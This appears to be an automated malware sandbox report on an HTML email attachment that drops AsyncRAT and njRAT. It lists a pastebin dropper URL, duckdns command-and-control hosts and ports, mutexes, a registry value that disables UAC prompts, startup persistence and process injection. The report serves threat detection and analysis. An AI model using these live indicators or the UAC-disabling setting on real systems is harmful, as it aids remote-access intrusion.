asyncrat | f2624c49b428fdedc12def0ad228758838fa95ff84ca3194b555d15b7ad67acd

Resubmissions

17-10-2024 17:13

241017-vrvb1awdmb 10

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

email-html-2.html
Size

1KB
MD5

e30672a61f4a8f232239d5046bb8d4ed
SHA1

82408b73208d1fc46cdd5f875e6fc139bac5dc34
SHA256

e8e74f88d1310a69c3092c2af288d0aeb9009bd80b7a6dcaf9a796362f82954e
SHA512

3e03339e04580ce4dc35058a722485077315767c36109576dc899919f09f4c5c1097f8fac5906e13b8f6170313c6a59e5151f06904e87730acce9405c7eaf7d5

Score

10^/10

asyncrat njrat 20agosto nyan cat septiembre20 discovery evasion execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

asyncrat

Version

1.0.7

Botnet

septiembre20

peinadorafael777.duckdns.org:2013

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

20agosto

carlitosmoreno1791.duckdns.org:2017

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

carlitosmoreno1794.duckdns.org:2019

Mutex

bde06c84e1de4b23b

Attributes

reg_key
bde06c84e1de4b23b
splitter
@!#&^%$

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
79	208	powershell.exe
80	1600	powershell.exe
81	3200	powershell.exe
83	3200	powershell.exe
84	1600	powershell.exe
85	208	powershell.exe
87	1600	powershell.exe
88	208	powershell.exe
89	3200	powershell.exe
93	208	powershell.exe
94	3200	powershell.exe
95	1600	powershell.exe
100	208	powershell.exe
101	3200	powershell.exe
102	1600	powershell.exe
106	5920	powershell.exe
107	5920	powershell.exe
110	5920	powershell.exe
111	5920	powershell.exe
112	5920	powershell.exe
116	5428	powershell.exe
117	5428	powershell.exe
119	5428	powershell.exe
120	5428	powershell.exe
121	5428	powershell.exe
123	748	powershell.exe
124	748	powershell.exe
126	748	powershell.exe
127	748	powershell.exe
128	748	powershell.exe
148	1764	powershell.exe
149	1764	powershell.exe
151	1764	powershell.exe
152	1764	powershell.exe
153	1764	powershell.exe
155	2456	powershell.exe
156	2456	powershell.exe
158	2456	powershell.exe
159	2456	powershell.exe
160	2456	powershell.exe
161	6024	powershell.exe
162	6024	powershell.exe
163	6024	powershell.exe
166	6024	powershell.exe
167	6024	powershell.exe
169	2508	powershell.exe
170	2508	powershell.exe
172	2508	powershell.exe
175	2508	powershell.exe
176	2508	powershell.exe
178	1212	powershell.exe
179	1212	powershell.exe
181	1212	powershell.exe
182	1212	powershell.exe
183	1212	powershell.exe
187	6096	powershell.exe
189	6096	powershell.exe
191	6096	powershell.exe
194	6096	powershell.exe
195	6096	powershell.exe
196	5208	powershell.exe
197	5208	powershell.exe
199	5208	powershell.exe
200	5208	powershell.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exemshta.exemshta.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____bjwql________________________________________-------.lnk	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 30 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4524	powershell.exe
5220	powershell.exe
208	powershell.exe
1600	powershell.exe
5280	powershell.exe
4808	powershell.exe
5208	powershell.exe
2336	powershell.exe
2456	powershell.exe
5624	powershell.exe
2508	powershell.exe
3200	powershell.exe
2852	powershell.exe
5428	powershell.exe
748	powershell.exe
6024	powershell.exe
5488	powershell.exe
1212	powershell.exe
6096	powershell.exe
5552	powershell.exe
5776	powershell.exe
5428	powershell.exe
5336	powershell.exe
1700	powershell.exe
3160	powershell.exe
5920	powershell.exe
2600	powershell.exe
3192	powershell.exe
1764	powershell.exe
5160	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 34 IoCs

Web Service

T1102

Processes:

flow	ioc
148	pastebin.com
149	bitbucket.org
162	bitbucket.org
169	pastebin.com
170	bitbucket.org
54	bitbucket.org
79	pastebin.com
123	pastebin.com
178	pastebin.com
196	pastebin.com
82	bitbucket.org
189	bitbucket.org
204	bitbucket.org
161	pastebin.com
81	pastebin.com
106	pastebin.com
187	pastebin.com
188	bitbucket.org
197	bitbucket.org
78	pastebin.com
84	bitbucket.org
117	bitbucket.org
203	pastebin.com
85	bitbucket.org
107	bitbucket.org
155	pastebin.com
124	bitbucket.org
53	bitbucket.org
80	pastebin.com
116	pastebin.com
179	bitbucket.org
55	bitbucket.org
83	bitbucket.org
156	bitbucket.org

Suspicious use of SetThreadContext 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 208 set thread context of 5540	208	powershell.exe	AddInProcess32.exe
PID 3200 set thread context of 5604	3200	powershell.exe	AddInProcess32.exe
PID 1600 set thread context of 5644	1600	powershell.exe	AddInProcess32.exe
PID 5920 set thread context of 6068	5920	powershell.exe	AddInProcess32.exe
PID 5428 set thread context of 884	5428	powershell.exe	AddInProcess32.exe
PID 748 set thread context of 2240	748	powershell.exe	AddInProcess32.exe
PID 1764 set thread context of 5716	1764	powershell.exe	AddInProcess32.exe
PID 2456 set thread context of 5236	2456	powershell.exe	AddInProcess32.exe
PID 6024 set thread context of 3784	6024	powershell.exe	AddInProcess32.exe
PID 2508 set thread context of 5288	2508	powershell.exe	AddInProcess32.exe
PID 1212 set thread context of 5568	1212	powershell.exe	AddInProcess32.exe
PID 6096 set thread context of 1444	6096	powershell.exe	AddInProcess32.exe
PID 5208 set thread context of 5532	5208	powershell.exe	AddInProcess32.exe
PID 4808 set thread context of 4872	4808	powershell.exe	AddInProcess32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

AddInProcess32.exepowershell.exetaskkill.exeDllHost.execmstp.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exepowershell.exeAddInProcess32.execmd.exepowershell.execmd.exemshta.exetaskkill.exeAddInProcess32.exeWScript.exepowershell.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exepowershell.exepowershell.exereg.exeAddInProcess32.exeAddInProcess32.exeAddInProcess32.exemshta.exepowershell.exeAddInProcess32.exetaskkill.execmstp.exeWScript.exepowershell.execmstp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4248 taskkill.exe
4680 taskkill.exe
3580 taskkill.exe

pid	process
4248	taskkill.exe
4680	taskkill.exe
3580	taskkill.exe

Modifies registry class 3 IoCs

Processes:

msedge.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5232 reg.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 360945.crdownload:SmartScreen msedge.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

Notepad.exe

pid process

5492 Notepad.exe

pid	process
5232	reg.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 360945.crdownload:SmartScreen	msedge.exe

pid	process
5492	Notepad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exe

pid	process
4392	msedge.exe
4392	msedge.exe
4860	msedge.exe
4860	msedge.exe
4152	identity_helper.exe
4152	identity_helper.exe
1764	msedge.exe
1764	msedge.exe
1700	powershell.exe
1700	powershell.exe
3192	powershell.exe
3192	powershell.exe
3192	powershell.exe
1700	powershell.exe
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
208	powershell.exe
208	powershell.exe
1600	powershell.exe
1600	powershell.exe
1600	powershell.exe
208	powershell.exe
5776	powershell.exe
5776	powershell.exe
5776	powershell.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
5280	powershell.exe
5280	powershell.exe
5280	powershell.exe
5428	powershell.exe
5428	powershell.exe
5428	powershell.exe
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
748	powershell.exe
748	powershell.exe
748	powershell.exe
5428	powershell.exe
5428	powershell.exe
5428	powershell.exe
1764	powershell.exe
1764	powershell.exe
1764	powershell.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
5644	AddInProcess32.exe
5644	AddInProcess32.exe
1764	powershell.exe
1764	powershell.exe
5488	powershell.exe
5488	powershell.exe
5488	powershell.exe
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
6024	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

4860 msedge.exe
4860 msedge.exe
4860 msedge.exe
4860 msedge.exe
4860 msedge.exe
4860 msedge.exe
4860 msedge.exe
4860 msedge.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	5776	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	5644	AddInProcess32.exe
Token: SeDebugPrivilege	5280	powershell.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	5488	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	5220	powershell.exe
Token: SeDebugPrivilege	5624	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	3784	AddInProcess32.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	3492	powershell.exe
Token: SeDebugPrivilege	4680	taskkill.exe
Token: SeDebugPrivilege	5288	AddInProcess32.exe
Token: 33	5288	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5288	AddInProcess32.exe
Token: SeDebugPrivilege	5160	powershell.exe
Token: SeDebugPrivilege	6096	powershell.exe
Token: 33	5288	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5288	AddInProcess32.exe
Token: SeDebugPrivilege	5336	powershell.exe
Token: SeDebugPrivilege	5208	powershell.exe
Token: SeDebugPrivilege	5552	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: 33	5288	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	5288	AddInProcess32.exe
Token: SeDebugPrivilege	3580	taskkill.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

msedge.exe

pid	process
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4860 wrote to memory of 512	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 512	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 312	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 4392	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 4392	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe
PID 4860 wrote to memory of 3136	4860	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\email-html-2.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93e5d46f8,0x7ff93e5d4708,0x7ff93e5d4718
2⤵
PID:512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
2⤵
PID:312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
